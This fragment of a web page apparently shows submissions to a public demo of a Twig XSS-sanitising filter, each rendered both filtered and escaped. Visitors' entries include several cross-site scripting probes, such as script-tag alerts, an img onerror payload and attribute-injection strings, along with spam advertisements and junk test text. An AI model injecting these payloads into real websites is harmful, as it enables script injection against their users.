</p> <p>description: Hi ,\\r\\n\\r\\nWho would I contact at your company that handles ordering your logo products, t-shirts, and promotional items?\\r\\n\\r\\nFor over 20 years we have been creating and supplying our clients with all their custom logo merchandise.\\r\\n\\r\\nWe can put your logo onto anything including:\\r\\n\\r\\n-Custom Printed T-shirts / Hoodies\\r\\n-Pens \\r\\n-Mugs \\r\\n-T-shirts \\r\\n-Bags \\r\\n-Banners \\r\\n-Table Covers \\r\\n-Key chains \\r\\n-USB flash drives \\r\\n\\r\\n---plus 350,000 other items!\\r\\n\\r\\nWe also offer PPE items such as hand sanitizer and masks.\\r\\n\\r\\nAre there any upcoming projects that you need logo items for?\\r\\n\\r\\nThanks in advance for your time.\\r\\n\\r\\nRegards,\\r\\n\\r\\nVincent\\r\\nCustom Branded Product Specialist</p> <p>by Vincent Helms | at 2021-10-07 14:41:22</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">\\\"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">\\\&quot;&gt;&lt;script&gt;console.log(\\\&quot;XSS Script\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): \\\"></p> <p>description: \\\"></p> <p>by \\\"> | at 2021-10-07 08:17:16</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">pada hari 15/09/2021</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">pada hari 15/09/2021</code> <p>keyword(s): /</p> <p>description: </p> <p>by \\\\\\\&quot; | at 2021-10-05 11:12:26</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(123);&lt;/script&gt;</code> <p>keyword(s): fdgdfg</p> <p>description: </p> <p>by fdgdf | at 2021-09-29 14:22:06</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">alert);</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">alert(document.location);</code> <p>keyword(s): </p> <p>description: </p> <p>by Stryhun | at 2021-09-27 10:18:39</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Hi there,\\r\\n\\r\\nHire Live Chat Agents - Unlimited chats - 24/7 coverage - Good Communication - Top Notch Support - Increase your sales 3 times with our 24/7 Live Chat Agents to generate more leads and excellent customer support. \\r\\nhttps://crotonz.com/live-chat.php\\r\\n\\r\\nHire Virtual Assistants and Agents for your website & business. Flexible Plans/ Pricing and Expert Employees. 15 days Free Trial. \\r\\nhttps://crotonz.com/virtual-assistants.php\\r\\n\\r\\nBest Regards\\r\\nSam Miller\\r\\ninfo@crotonz.com</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Hi there,\\r\\n\\r\\nHire Live Chat Agents - Unlimited chats - 24/7 coverage - Good Communication - Top Notch Support - Increase your sales 3 times with our 24/7 Live Chat Agents to generate more leads and excellent customer support. \\r\\nhttps://crotonz.com/live-chat.php\\r\\n\\r\\nHire Virtual Assistants and Agents for your website &amp; business. Flexible Plans/ Pricing and Expert Employees. 15 days Free Trial. \\r\\nhttps://crotonz.com/virtual-assistants.php\\r\\n\\r\\nBest Regards\\r\\nSam Miller\\r\\ninfo@crotonz.com</code> <p>keyword(s): </p> <p>description: Hi there,\\r\\n\\r\\nHire Live Chat Agents - Unlimited chats - 24/7 coverage - Good Communication - Top Notch Support - Increase your sales 3 times with our 24/7 Live Chat Agents to generate more leads and excellent customer support. \\r\\nhttps://crotonz.com/live-chat.php\\r\\n\\r\\nHire Virtual Assistants and Agents for your website &amp; business. Flexible Plans/ Pricing and Expert Employees. 15 days Free Trial. \\r\\nhttps://crotonz.com/virtual-assistants.php\\r\\n\\r\\nBest Regards\\r\\nSam Miller\\r\\ninfo@crotonz.com</p> <p>by Teodoro Robinson | at 2021-09-25 23:08:50</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">dc</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">dc</code> <p>keyword(s): cd</p> <p>description: dc</p> <p>by dcd | at 2021-09-23 18:27:05</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">hii" accesskey="x" ="alert&#40;document.domain&#41;</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">hii&amp;quot;&amp;#32;accesskey&amp;#61;&amp;quot;x&amp;quot;&amp;#32;onclick&amp;#61;&amp;quot;alert&amp;#40;document&amp;#46;domain&amp;#41;</code> <p>keyword(s): a</p> <p>description: a</p> <p>by q | at 2021-09-23 11:23:50</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\&#039;aa\\\&#039;);&lt;/script&gt;</code> <p>keyword(s): test</p> <p>description: test</p> <p>by test | at 2021-09-19 07:23:14</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">efeefefe</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">efeefefe</code> <p>keyword(s): tse</p> <p>description: etes</p> <p>by budi | at 2021-09-16 16:41:31</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;!--[if IE]>blabla<![endif]--&gt;\\r\\n<img >alert&#40;\\\'kokot\\\'&#41;;\\\">\\r\\nbubub</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;!--[if IE]&gt;blabla&lt;![endif]--&gt;\\r\\n&lt;img src=\\\&quot;kokot.jpg\\\&quot; onerror=\\\&quot;&lt;script&gt;alert(\\\&#039;kokot\\\&#039;);&lt;/script&gt;\\\&quot;&gt;\\r\\nbubub</code> <p>keyword(s): blbecek</p> <p>description: holahej</p> <p>by debil | at 2021-09-13 15:56:12</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">https://test.com/\\\"onmouse<marquee>over={alert`1`}<marquee>\\\"</marquee></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">https://test.com/\\\&quot;onmouse&lt;marquee&gt;over={alert`1`}&lt;marquee&gt;\\\&quot;&lt;/marquee&gt;</code> <p>keyword(s): a</p> <p>description: asdsad</p> <p>by C | at 2021-09-10 13:58:40</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><p>Foo</p>\\r\\n<besch>iwjhf iuew</besch></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;p&gt;Foo&lt;/p&gt;\\r\\n&lt;besch&gt;iwjhf iuew&lt;/besch&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by me | at 2021-09-09 15:20:10</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><beschreibung>test</beschreibung></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;beschreibung&gt;test&lt;/beschreibung&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by me3 | at 2021-09-09 15:19:11</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">test</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">test</code> <p>keyword(s): </p> <p>description: </p> <p>by me2 | at 2021-09-09 15:18:44</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><beschreibung fo uhefihwefiuhwef> </beschreibung></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;beschreibung fo uhefihwefiuhwef&gt; &lt;/beschreibung&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by Me | at 2021-09-09 15:18:21</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;&lt;/script&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by aaaa | at 2021-09-08 14:17:09</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">sdds</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">sdds</code> <p>keyword(s): </p> <p>description: </p> <p>by dcvxzser434634&lt;scropt&gt; | at 2021-09-08 14:09:46</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><blockquote class=\\\\\\\\\\\\\\\"imgur-embed-pub\\\\\\\\\\\\\\\" lang=\\\\\\\\\\\\\\\"en\\\\\\\\\\\\\\\" data-id=\\\\\\\\\\\\\\\"a/JM2Eh4Z\\\\\\\\\\\\\\\" ><a >The real L word</a></blockquote>\\r\\n</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;blockquote class=\\\\\\\\\\\\\\\&quot;imgur-embed-pub\\\\\\\\\\\\\\\&quot; lang=\\\\\\\\\\\\\\\&quot;en\\\\\\\\\\\\\\\&quot; data-id=\\\\\\\\\\\\\\\&quot;a/JM2Eh4Z\\\\\\\\\\\\\\\&quot; &gt;&lt;a href=\\\\\\\\\\\\\\\&quot;//imgur.com/a/JM2Eh4Z\\\\\\\\\\\\\\\&quot;&gt;The real L word&lt;/a&gt;&lt;/blockquote&gt;&lt;script async src=\\\\\\\\\\\\\\\&quot;//s.imgur.com/min/embed.js\\\\\\\\\\\\\\\&quot; charset=\\\\\\\\\\\\\\\&quot;utf-8\\\\\\\\\\\\\\\&quot;&gt;&lt;/script&gt;\\r\\n</code> <p>keyword(s): </p> <p>description: </p> <p>by بليسبسيب | at 2021-09-08 13:19:28</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">vdhsh</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">vdhsh&lt;script&gt;alert(\\\&quot;hey\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by | at 2021-09-08 12:03:50</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">Gx. Vbvbn</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">Gx. Vbvbn</code> <p>keyword(s): Cvbvccc</p> <p>description: Vvvvvvnn</p> <p>by Ffzs | at 2021-09-08 12:02:03</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;script&gt;alert(\\\&quot;hey\\\&quot;);&lt;/script&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by l | at 2021-09-04 15:26:15</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">\\\'\\\';!--\\\"<XSS>=&{()}</code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}</code> <p>keyword(s): </p> <p>description: </p> <p>by l | at 2021-09-04 15:24:01</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word"><blockquote class=\\\"imgur-embed-pub\\\" lang=\\\"en\\\" data-id=\\\"a/JM2Eh4Z\\\" ><a >The real L word</a></blockquote></code> <p>result with twig: &#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x65;&#x73;&#x63;&#x61;&#x70;&#x65;&#x20;&#x7D;&#x7D;:</p> <code class="break-word">&lt;blockquote class=\\\&quot;imgur-embed-pub\\\&quot; lang=\\\&quot;en\\\&quot; data-id=\\\&quot;a/JM2Eh4Z\\\&quot; &gt;&lt;a href=\\\&quot;//imgur.com/a/JM2Eh4Z\\\&quot;&gt;The real L word&lt;/a&gt;&lt;/blockquote&gt;&lt;script async src=\\\&quot;//s.imgur.com/min/embed.js\\\&quot; charset=\\\&quot;utf-8\\\&quot;&gt;&lt;/script&gt;</code> <p>keyword(s): </p> <p>description: </p> <p>by Teste | at 2021-09-03 15:06:04</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: 